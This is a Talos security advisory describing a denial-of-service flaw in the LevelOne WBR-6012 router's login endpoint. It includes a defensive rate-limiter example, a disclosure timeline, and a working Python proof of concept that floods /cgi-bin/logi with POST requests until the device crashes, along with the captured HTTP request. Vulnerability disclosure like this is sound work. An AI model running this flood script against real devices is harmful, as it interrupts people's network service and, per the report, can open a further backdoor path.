Talos Vulnerability Report

TALOS-2024-1982

LevelOne WBR-6012 Web Application improper resource allocation vulnerability

October 30, 2024
CVE Number

CVE-2024-31152

SUMMARY

The LevelOne WBR-6012 router with firmware R0.40e6 is vulnerable to improper resource allocation within its web application, where a series of crafted HTTP requests can cause a reboot. This could lead to network service interruptions.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6012 R0.40e6

PRODUCT URLS

WBR-6012 - https://us.level1.com/products/wbr-6012

CVSSv3 SCORE

5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-400 - Uncontrolled Resource Consumption

DETAILS

The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.

The LevelOne WBR-6012 router's web application is vulnerable to a flood-based denial of service because the login endpoint applies no meaningful rate limiting: an unauthenticated attacker on the network can overwhelm the web server simply by sending requests faster than it can dispose of them. A flood of valid HTTP POST requests to the /cgi-bin/logi endpoint causes the device to crash and reboot, and the reboot in turn enables the backdoor access described in TALOS-2024-1979.
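The report attributes the crash to missing rate limiting on the login endpoint. The following is an added illustration written for this page, not LevelOne's firmware code: a sliding-window limiter keyed by client address that a login handler would consult before doing any work, replayed against a flood shaped like the PoC's POST bodies. The request budget, the window length and the client address 192.168.1.50 are assumptions; the form fields PS and rd are the ones from the captured request.

```python
import time
from collections import defaultdict, deque

# Assumed policy for this illustration (not LevelOne's firmware):
# at most MAX_REQUESTS login POSTs per client address per WINDOW_SECONDS.
MAX_REQUESTS = 20
WINDOW_SECONDS = 10.0


class LoginRateLimiter:
    """Sliding-window limiter keyed by client address, meant to run before
    the login handler (standing in for /cgi-bin/logi here) does any work."""

    def __init__(self, max_requests=MAX_REQUESTS, window=WINDOW_SECONDS,
                 clock=time.monotonic):
        self.max_requests = max_requests
        self.window = window
        self.clock = clock
        self._hits = defaultdict(deque)  # client -> timestamps still in window

    def allow(self, client):
        now = self.clock()
        q = self._hits[client]
        # Forget requests that have aged out of the window.
        while q and now - q[0] >= self.window:
            q.popleft()
        if len(q) >= self.max_requests:
            return False
        q.append(now)
        return True


def handle_login_unlimited(form):
    """Weak pattern: every POST reaches the login logic and whatever it
    allocates. Returns an HTTP status code."""
    return 200


def handle_login_limited(limiter, client, form):
    """Hardened pattern: consult the limiter first and answer 429 without
    touching the login logic once the client has used up its budget."""
    if not limiter.allow(client):
        return 429
    return handle_login_unlimited(form)


def simulate_flood(count, limited=True, clock=None):
    """Replay `count` POSTs shaped like the PoC body (PS=test&rd=status) from
    a single constructed client address. Returns (accepted, rejected)."""
    form = {'PS': 'test', 'rd': 'status'}
    client = '192.168.1.50'  # constructed attacker address on the LAN
    limiter = LoginRateLimiter(clock=clock or time.monotonic)
    accepted = rejected = 0
    for _ in range(count):
        if limited:
            code = handle_login_limited(limiter, client, form)
        else:
            code = handle_login_unlimited(form)
        if code == 200:
            accepted += 1
        else:
            rejected += 1
    return accepted, rejected


class FakeClock:
    """Deterministic clock so window expiry can be shown without sleeping."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


def demo_window_expiry():
    """Three requests fill a 3-request budget, the fourth is refused, and the
    budget is available again once the window has elapsed."""
    clock = FakeClock()
    limiter = LoginRateLimiter(max_requests=3, window=10.0, clock=clock)
    client = '192.168.1.50'
    filled = all(limiter.allow(client) for _ in range(3))
    refused = limiter.allow(client)
    clock.advance(10.0)
    restored = limiter.allow(client)
    return filled, refused, restored


if __name__ == '__main__':
    print('unlimited:', simulate_flood(2000, limited=False))
    print('limited:  ', simulate_flood(2000, limited=True))
    print('expiry:   ', demo_window_expiry())
```

A per-source budget like this bounds what one host can send to the login handler, so a flood of the size the PoC needs never reaches the code that exhausts the device. It is a mitigation in front of the bug, not a fix for the resource handling inside the handler, and the budget has to be chosen so that repeated legitimate administrator logins are not refused.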

Exploit Proof of Concept

Sending the request below repeatedly in quick succession triggers the crash. The number of requests needed varies between runs: sometimes roughly 100-140 are enough, sometimes it is closer to 1,200.

import requests

# Default LAN address of the router's web interface; adjust if the device
# has been re-addressed.
url = 'http://192.168.1.1/cgi-bin/logi'

# Same form body as the captured request: PS and rd alone are enough to
# reach the vulnerable handler. The two commented-out fields are kept from
# the original PoC but are not sent.
data = {'PS': 'test',
        # 'rc': '=%40',
        'rd': 'status',
        # 'TC': '1707304321.99'
        }

# Upper bound comfortably above the ~100-1,200 requests observed to be needed.
for i in range(2000):
    try:
        response = requests.post(url, data=data, timeout=5)
    except requests.exceptions.RequestException as exc:
        # A refused/reset connection or a timeout is the expected sign that
        # the device has crashed and is rebooting.
        print('req: %d\tno response (%s)' % (i, exc.__class__.__name__))
        break
    print('req: %d\tResp Code: %d' % (i, response.status_code))


POST /cgi-bin/logi HTTP/1.1
Host: 192.168.1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 17
Content-Type: application/x-www-form-urlencoded

PS=test&rd=status

TIMELINE

2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release

Credit

Discovered by Patrick DeSantis of Cisco Talos.